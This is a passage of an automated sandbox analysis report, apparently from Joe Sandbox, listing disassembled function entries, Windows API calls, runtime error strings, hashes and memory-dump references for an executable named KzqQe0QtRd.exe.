                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF701282463,?,?,?,00007FF70127CBBC,?,?,00000000,00007FF701273A8F), ref: 00007FF70127A754
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF701282463,?,?,?,00007FF70127CBBC,?,?,00000000,00007FF701273A8F), ref: 00007FF70127A77C
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF701282463,?,?,?,00007FF70127CBBC,?,?,00000000,00007FF701273A8F), ref: 00007FF70127A78D
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF701282463,?,?,?,00007FF70127CBBC,?,?,00000000,00007FF701273A8F), ref: 00007FF70127A79E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                            • Opcode ID: 9dcc94c0073ee170a57e1df73e5138f0fc39046db5921ae8275996bd67e22a2a
                                                                                                                                                                                            • Instruction ID: 53fd6c7a9954f9a5a981b318cb6f93fb5eba3c85d472bbd4e75ffa43590ed428
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9dcc94c0073ee170a57e1df73e5138f0fc39046db5921ae8275996bd67e22a2a
                                                                                                                                                                                            • Instruction Fuzzy Hash: A811BD64B0920742FB68F6695C125BFE2964F46774FD80A34E93E0B2D2DFACB8419371
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                            • Opcode ID: 04f77fab494744c2c515884d2b3c345e4279dac145e4d051e3529eeeffec7512
                                                                                                                                                                                            • Instruction ID: 526dcc85f1e11d918b52c6d36169e59136e4f47052280fd3930e0790269069f0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 04f77fab494744c2c515884d2b3c345e4279dac145e4d051e3529eeeffec7512
                                                                                                                                                                                            • Instruction Fuzzy Hash: AB81B372F0C28385F765FF298B1127AA6A0EF11748FD58031DE2D97295DBACE9019721
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                            • Opcode ID: 6cf636c1d413b9b1a8fe847baa594964b2e94e970a9ab49fc3c7a486a408bf4b
                                                                                                                                                                                            • Instruction ID: 2a61312d69b2a7a6b22e156eb88bb6c23003a90902ff1466433f23be24262521
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cf636c1d413b9b1a8fe847baa594964b2e94e970a9ab49fc3c7a486a408bf4b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D616B36B08B868AE710EF65D8403ADB7A0FB44B88F454225EE4D17B98CFB8E455C750
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                            • Opcode ID: 15a90b008ee0b5328ce42465ae6c6f27eb603fbbd906650bc51354757df09ebd
                                                                                                                                                                                            • Instruction ID: 00466e4a7b62f36264f65e17d31d181f331c57fd1dfca95540b152a652e6d8ac
                                                                                                                                                                                            • Opcode Fuzzy Hash: 15a90b008ee0b5328ce42465ae6c6f27eb603fbbd906650bc51354757df09ebd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2151B176B082838AEB30EF159944368B7A0FF54B98F954135DA8C47AD5DFBCE8908B11
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                            • API String ID: 1878133881-2410924014
                                                                                                                                                                                            • Opcode ID: 4ccfa1ca3bcae5acffff1ea197f60ccb63abed4ad3799bdff7ceda7eadf1df34
                                                                                                                                                                                            • Instruction ID: 93ffc36d2b0961105989bb1fc4d3c0912599c3549ed3f3585ef5a69d6c067a7e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ccfa1ca3bcae5acffff1ea197f60ccb63abed4ad3799bdff7ceda7eadf1df34
                                                                                                                                                                                            • Instruction Fuzzy Hash: B1312F7272868291E720EB10E8516EAA364FF94784FC04036EA8D47A99DFBCD645CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF7012636B9), ref: 00007FF701263BF1
                                                                                                                                                                                              • Part of subcall function 00007FF701262620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF701267774,?,?,?,?,?,?,?,?,?,?,?,00007FF70126101D), ref: 00007FF701262654
                                                                                                                                                                                              • Part of subcall function 00007FF701262620: MessageBoxW.USER32 ref: 00007FF701262730
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                            • API String ID: 2581892565-1977442011
                                                                                                                                                                                            • Opcode ID: 1e1fb772b1588bb2ef8aa65086850d6655ce62306cfd8bfdc61953077b8dd8c7
                                                                                                                                                                                            • Instruction ID: b076610a9276524349f8d1c25a03bdfb36f1db6567d4ec73a59dcc1401489fa6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e1fb772b1588bb2ef8aa65086850d6655ce62306cfd8bfdc61953077b8dd8c7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 98014F61B1A68385FB61F721EC553B5A291BF587C4FC00432E84D876D6EFDCE1458720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                            • Opcode ID: 1e365f9b30df03f18385238fa5722fca72bc799989c9a48dcea0a3fe118199c6
                                                                                                                                                                                            • Instruction ID: 803e8094203eee26b9074d2875ed126ab2d84f4357eed6a63511f5c36acd6737
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e365f9b30df03f18385238fa5722fca72bc799989c9a48dcea0a3fe118199c6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 77D1F032B18A828AE711DF75D8402ADB7B1FF44B98B804236DE5E97B99DF78D016C310
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                            • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                                            • Instruction ID: df1ecbcdf93000d8ef50ef5c2c1825f283757a609ddaf44490e600d279201f66
                                                                                                                                                                                            • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6411A921F1824382F754A769ED442B9A292EFD9780FC48031E94947BDDCFACE4D58210
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                            • Opcode ID: 52680a59223a085ee97f839467cc497833a0271fa4472f3ef08586064223ff36
                                                                                                                                                                                            • Instruction ID: 8f0394222308350f959a18ebccd7b93feb8870038c8c5c745f301035b94ff7c0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 52680a59223a085ee97f839467cc497833a0271fa4472f3ef08586064223ff36
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5941E212B1D2C343FB64BB25980137AA6A0EF91BA4F944235EE5C86ED9DFBCD4418710
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF701277ECE
                                                                                                                                                                                              • Part of subcall function 00007FF701279E48: RtlReleasePrivilege.NTDLL(?,?,?,00007FF701281E72,?,?,?,00007FF701281EAF,?,?,00000000,00007FF701282375,?,?,?,00007FF7012822A7), ref: 00007FF701279E5E
                                                                                                                                                                                              • Part of subcall function 00007FF701279E48: GetLastError.KERNEL32(?,?,?,00007FF701281E72,?,?,?,00007FF701281EAF,?,?,00000000,00007FF701282375,?,?,?,00007FF7012822A7), ref: 00007FF701279E68
                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF70126B135), ref: 00007FF701277EEC
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorFileLastModuleNamePrivilegeRelease_invalid_parameter_noinfo
                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                            • API String ID: 1752791759-1641059233
                                                                                                                                                                                            • Opcode ID: 20e0fa1cddfcb9b50fa612d7809b1235543b267f8bf6d467ddf7fa8b8e985724
                                                                                                                                                                                            • Instruction ID: 20c44941161d06324a1ac53696bcc675f37a7de3dae183397769b9586c0fa371
                                                                                                                                                                                            • Opcode Fuzzy Hash: 20e0fa1cddfcb9b50fa612d7809b1235543b267f8bf6d467ddf7fa8b8e985724
                                                                                                                                                                                            • Instruction Fuzzy Hash: D4414932B08B4386EB15EF219D500BAB6A4EF49794BD44036EA4E43B95DFB8E491C320
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                            • Opcode ID: 7853f05ac379f521114fefc1a42187cdb8ba925dbe71da0877b6f38df8d0512d
                                                                                                                                                                                            • Instruction ID: df6287e10faeb76b3192899c240a686e68362b46050cf1c9d7f7417d54c8ea89
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7853f05ac379f521114fefc1a42187cdb8ba925dbe71da0877b6f38df8d0512d
                                                                                                                                                                                            • Instruction Fuzzy Hash: CE41B262B19A4382DB20EF65E8443AAB7A0FF98794F904031EE4D87B98DFBCD411C750
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                            • Opcode ID: ab9fd17095cc13701cfb0daaa58d5b6901f9a6a28f880bc0456c606be9a7d1bf
                                                                                                                                                                                            • Instruction ID: 6f34912eed8a6582dd2e42703027110ec4814e1de02d4c3f8b8a2bf85a9ca6f3
                                                                                                                                                                                            • Opcode Fuzzy Hash: ab9fd17095cc13701cfb0daaa58d5b6901f9a6a28f880bc0456c606be9a7d1bf
                                                                                                                                                                                            • Instruction Fuzzy Hash: FB217372B0868785EB20EB15E84427EA3A1FF84B44F864035D68D47685EFBCE9858771
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                            • String ID: Error detected
                                                                                                                                                                                            • API String ID: 1878133881-3513342764
                                                                                                                                                                                            • Opcode ID: 3a752796a53e4bc79ccde23300fb76c48695a964a89870303d0a97fe25c8ba30
                                                                                                                                                                                            • Instruction ID: 3e053b348b0b7956e1cbb61fbfacc269c4e4215700de9a780ce63c7d7cc73332
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a752796a53e4bc79ccde23300fb76c48695a964a89870303d0a97fe25c8ba30
                                                                                                                                                                                            • Instruction Fuzzy Hash: C921307272868291EB20EB10E8516EAA364FF94788FC05136AA8D47A95DF7CD215CB60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                            • String ID: Fatal error detected
                                                                                                                                                                                            • API String ID: 1878133881-4025702859
                                                                                                                                                                                            • Opcode ID: 467762ab5f403c00d0413d4f15cd763011442619e8d5336c18fe6ceaac1fee72
                                                                                                                                                                                            • Instruction ID: 07ada86d8c0ec9de7356bbd8e06dea26e0683cd5bab9923371f8fa479f084501
                                                                                                                                                                                            • Opcode Fuzzy Hash: 467762ab5f403c00d0413d4f15cd763011442619e8d5336c18fe6ceaac1fee72
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F21747272868291E720E750F8516EAB364FF94784FC05136EA8D47AA5DFBCD245C720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                            • Opcode ID: 0a7d407d7729a8694e7779ca2a1de00754ab8488b643d7346c0eaced0571dbb1
